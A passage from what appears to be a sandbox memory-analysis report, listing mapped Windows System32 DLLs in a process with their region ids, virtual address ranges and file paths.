"\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 742 start_va = 0x7ffaec700000 end_va = 0x7ffaec75cfff entry_point = 0x7ffaec700000 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 743 start_va = 0x7ffaec760000 end_va = 0x7ffaec77ffff entry_point = 0x7ffaec760000 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 744 start_va = 0x7ffaec780000 end_va = 0x7ffaec787fff entry_point = 0x7ffaec780000 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 745 start_va = 0x7ffaec790000 end_va = 0x7ffaec7a0fff entry_point = 0x7ffaec790000 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 746 start_va = 0x7ffaecf80000 end_va = 0x7ffaecf98fff entry_point = 0x7ffaecf80000 region_type = mapped_file name = "usoapi.dll" filename = "\\Windows\\System32\\usoapi.dll" (normalized: "c:\\windows\\system32\\usoapi.dll") Region: id = 747 start_va = 0x7ffaecfa0000 end_va = 0x7ffaecfb3fff entry_point = 0x7ffaecfa0000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 748 start_va = 0x7ffaecfd0000 end_va = 0x7ffaecfe6fff entry_point = 0x7ffaecfd0000 region_type = mapped_file name = "dmcmnutils.dll" filename = "\\Windows\\System32\\dmcmnutils.dll" (normalized: "c:\\windows\\system32\\dmcmnutils.dll") Region: id = 749 start_va = 0x7ffaecff0000 end_va = 0x7ffaed049fff entry_point = 0x7ffaecff0000 region_type = mapped_file name = "usocore.dll" filename = "\\Windows\\System32\\usocore.dll" (normalized: "c:\\windows\\system32\\usocore.dll") Region: id = 750 start_va = 0x7ffaed060000 end_va = 0x7ffaed07cfff entry_point = 0x7ffaed060000 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 751 start_va = 0x7ffaed140000 end_va = 0x7ffaed147fff entry_point = 0x7ffaed140000 region_type = mapped_file name = "dmiso8601utils.dll" filename = "\\Windows\\System32\\dmiso8601utils.dll" (normalized: "c:\\windows\\system32\\dmiso8601utils.dll") Region: id = 752 start_va = 0x7ffaef0b0000 end_va = 0x7ffaef0c2fff entry_point = 0x7ffaef0b0000 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 753 start_va = 0x7ffaef0d0000 end_va = 0x7ffaef0ecfff entry_point = 0x7ffaef0d0000 region_type = mapped_file name = "appinfo.dll" filename = "\\Windows\\System32\\appinfo.dll" (normalized: "c:\\windows\\system32\\appinfo.dll") Region: id = 754 start_va = 0x7ffaef360000 end_va = 0x7ffaef391fff entry_point = 0x7ffaef360000 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 755 start_va = 0x7ffaef4e0000 end_va = 0x7ffaef506fff entry_point = 0x7ffaef4e0000 region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" (normalized: "c:\\windows\\system32\\cabinet.dll") Region: id = 756 start_va = 0x7ffaef510000 end_va = 0x7ffaef55bfff entry_point = 0x7ffaef510000 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 757 start_va = 0x7ffaef560000 end_va = 0x7ffaef5defff entry_point = 0x7ffaef560000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 758 start_va = 0x7ffaef5e0000 end_va = 0x7ffaef61bfff entry_point = 0x7ffaef5e0000 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 759 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 760 start_va = 0x7ffaef7b0000 end_va = 0x7ffaef841fff entry_point = 0x7ffaef7b0000 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 761 start_va = 0x7ffaef850000 end_va = 0x7ffaef888fff entry_point = 0x7ffaef850000 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 762 start_va = 0x7ffaef890000 end_va = 0x7ffaef898fff entry_point = 0x7ffaef890000 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 763 start_va = 0x7ffaef8a0000 end_va = 0x7ffaef8d4fff entry_point = 0x7ffaef8a0000 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 764 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 765 start_va = 0x7ffaf0560000 end_va = 0x7ffaf0568fff entry_point = 0x7ffaf0560000 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 766 start_va = 0x7ffaf0570000 end_va = 0x7ffaf059cfff entry_point = 0x7ffaf0570000 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 767 start_va = 0x7ffaf05a0000 end_va = 0x7ffaf05affff entry_point = 0x7ffaf05a0000 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 768 start_va = 0x7ffaf05b0000 end_va = 0x7ffaf0600fff entry_point = 0x7ffaf05b0000 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 769 start_va = 0x7ffaf0610000 end_va = 0x7ffaf061bfff entry_point = 0x7ffaf0610000 region_type = mapped_file name = "fvecerts.dll" filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll") Region: id = 770 start_va = 0x7ffaf0680000 end_va = 0x7ffaf073dfff entry_point = 0x7ffaf0680000 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 771 start_va = 0x7ffaf0740000 end_va = 0x7ffaf07d5fff entry_point = 0x7ffaf0740000 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 772 start_va = 0x7ffaf07f0000 end_va = 0x7ffaf0809fff entry_point = 0x7ffaf07f0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 773 start_va = 0x7ffaf0810000 end_va = 0x7ffaf0825fff entry_point = 0x7ffaf0810000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 774 start_va = 0x7ffaf0920000 end_va = 0x7ffaf0987fff entry_point = 0x7ffaf0920000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 775 start_va = 0x7ffaf0a90000 end_va = 0x7ffaf0aabfff entry_point = 0x7ffaf0a90000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 776 start_va = 0x7ffaf0de0000 end_va = 0x7ffaf0f10fff entry_point = 0x7ffaf0de0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 777 start_va = 0x7ffaf0f20000 end_va = 0x7ffaf0f5dfff entry_point = 0x7ffaf0f20000 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 778 start_va = 0x7ffaf0f60000 end_va = 0x7ffaf0f77fff entry_point = 0x7ffaf0f60000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 779 start_va = 0x7ffaf0f80000 end_va = 0x7ffaf1033fff entry_point = 0x7ffaf0f80000 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 780 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 781 start_va = 0x7ffaf12a0000 end_va = 0x7ffaf12ccfff entry_point = 0x7ffaf12a0000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 782 start_va = 0x7ffaf12d0000 end_va = 0x7ffaf12dffff entry_point = 0x7ffaf12d0000 region_type = mapped_file name = "timebrokerclient.dll" filename = "\\Windows\\System32\\TimeBrokerClient.dll" (normalized: "c:\\windows\\system32\\timebrokerclient.dll") Region: id = 783 start_va = 0x7ffaf12e0000 end_va = 0x7ffaf130dfff entry_point = 0x7ffaf12e0000 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 784 start_va = 0x7ffaf1310000 end_va = 0x7ffaf1326fff entry_point = 0x7ffaf1310000 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 785 start_va = 0x7ffaf1330000 end_va = 0x7ffaf1371fff entry_point = 0x7ffaf1330000 region_type = mapped_file name = "mstask.dll" filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll") Region: id = 786 start_va = 0x7ffaf1380000 end_va = 0x7ffaf1395fff entry_point = 0x7ffaf1380000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 787 start_va = 0x7ffaf13a0000 end_va = 0x7ffaf13affff entry_point = 0x7ffaf13a0000 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 788 start_va = 0x7ffaf13b0000 end_va = 0x7ffaf141dfff entry_point = 0x7ffaf13b0000 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 789 start_va = 0x7ffaf1420000 end_va = 0x7ffaf1430fff entry_point = 0x7ffaf1420000 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 790 start_va = 0x7ffaf1440000 end_va = 0x7ffaf144cfff entry_point = 0x7ffaf1440000 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 791 start_va = 0x7ffaf1450000 end_va = 0x7ffaf148ffff entry_point = 0x7ffaf1450000 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 792 start_va = 0x7ffaf1490000 end_va = 0x7ffaf158bfff entry_point = 0x7ffaf1490000 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 793 start_va = 0x7ffaf1590000 end_va = 0x7ffaf1609fff entry_point = 0x7ffaf1590000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 794 start_va = 0x7ffaf1620000 end_va = 0x7ffaf1632fff entry_point = 0x7ffaf1620000 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 795 start_va = 0x7ffaf1640000 end_va = 0x7ffaf16fffff entry_point = 0x7ffaf1640000 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 796 start_va = 0x7ffaf1700000 end_va = 0x7ffaf171dfff entry_point = 0x7ffaf1700000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 797 start_va = 0x7ffaf1720000 end_va = 0x7ffaf1746fff entry_point = 0x7ffaf1720000 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 798 start_va = 0x7ffaf1750000 end_va = 0x7ffaf17a4fff entry_point = 0x7ffaf1750000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 799 start_va = 0x7ffaf1880000 end_va = 0x7ffaf18e4fff entry_point = 0x7ffaf1880000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 800 start_va = 0x7ffaf1930000 end_va = 0x7ffaf193afff entry_point = 0x7ffaf1930000 region_type = mapped_file name = "ktmw32.dll" filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll") Region: id = 801 start_va = 0x7ffaf1940000 end_va = 0x7ffaf194afff entry_point = 0x7ffaf1940000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 802 start_va = 0x7ffaf1960000 end_va = 0x7ffaf1997fff entry_point = 0x7ffaf1960000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 803 start_va = 0x7ffaf1b60000 end_va = 0x7ffaf1b69fff entry_point = 0x7ffaf1b60000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 804 start_va = 0x7ffaf1b70000 end_va = 0x7ffaf1b87fff entry_point = 0x7ffaf1b70000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 805 start_va = 0x7ffaf1b90000 end_va = 0x7ffaf1cdcfff entry_point = 0x7ffaf1b90000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 806 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 807 start_va = 0x7ffaf2b90000 end_va = 0x7ffaf2c07fff entry_point = 0x7ffaf2b90000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 808 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 809 start_va = 0x7ffaf2db0000 end_va = 0x7ffaf2dd6fff entry_point = 0x7ffaf2db0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 810 start_va = 0x7ffaf2e10000 end_va = 0x7ffaf2e1bfff entry_point = 0x7ffaf2e10000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 811 start_va = 0x7ffaf3170000 end_va = 0x7ffaf31a1fff entry_point = 0x7ffaf3170000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 812 start_va = 0x7ffaf31b0000 end_va = 0x7ffaf3231fff entry_point = 0x7ffaf31b0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 813 start_va = 0x7ffaf3360000 end_va = 0x7ffaf3382fff entry_point = 0x7ffaf3360000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 814 start_va = 0x7ffaf3490000 end_va = 0x7ffaf349bfff entry_point = 0x7ffaf3490000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 815 start_va = 0x7ffaf3500000 end_va = 0x7ffaf3547fff entry_point = 0x7ffaf3500000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 816 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 817 start_va = 0x7ffaf36d0000 end_va = 0x7ffaf36ebfff entry_point = 0x7ffaf36d0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 818 start_va = 0x7ffaf36f0000 end_va = 0x7ffaf36fbfff entry_point = 0x7ffaf36f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 819 start_va = 0x7ffaf3700000 end_va = 0x7ffaf3725fff entry_point = 0x7ffaf3700000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 820 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 821 start_va = 0x7ffaf38c0000 end_va = 0x7ffaf38c9fff entry_point = 0x7ffaf38c0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 822 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 823 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 824 start_va = 0x7ffaf3a70000 end_va = 0x7ffaf3aadfff entry_point = 0x7ffaf3a70000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 825 start_va = 0x7ffaf3ab0000 end_va = 0x7ffaf3b57fff entry_point = 0x7ffaf3ab0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 826 start_va = 0x7ffaf3ca0000 end_va = 0x7ffaf3cfcfff entry_point = 0x7ffaf3ca0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 827 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 828 start_va = 0x7ffaf3ea0000 end_va = 0x7ffaf3ec0fff entry_point = 0x7ffaf3ea0000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 829 start_va = 0x7ffaf3ed0000 end_va = 0x7ffaf3f05fff entry_point = 0x7ffaf3ed0000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 830 start_va = 0x7ffaf4180000 end_va = 0x7ffaf41a5fff entry_point = 0x7ffaf4180000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 831 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 832 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 833 start_va = 0x7ffaf4230000 end_va = 0x7ffaf4249fff entry_point = 0x7ffaf4230000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 834 start_va = 0x7ffaf4250000 end_va = 0x7ffaf4257fff entry_point = 0x7ffaf4250000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 835 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 836 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 837 start_va = 0x7ffaf4300000 end_va = 0x7ffaf4397fff entry_point = 0x7ffaf4300000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 838 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 839 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 840 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 841 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 842 start_va = 0x7ffaf44e0000 end_va = 0x7ffaf4533fff entry_point = 0x7ffaf44e0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 843 start_va = 0x7ffaf4540000 end_va = 0x7ffaf4583fff entry_point = 0x7ffaf4540000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 844 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 845 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 846 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 847 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 848 start_va = 0x7ffaf50e0000 end_va = 0x7ffaf513afff entry_point = 0x7ffaf50e0000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 849 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 850 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 851 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 852 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 853 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 854 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 855 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 856 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 857 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = 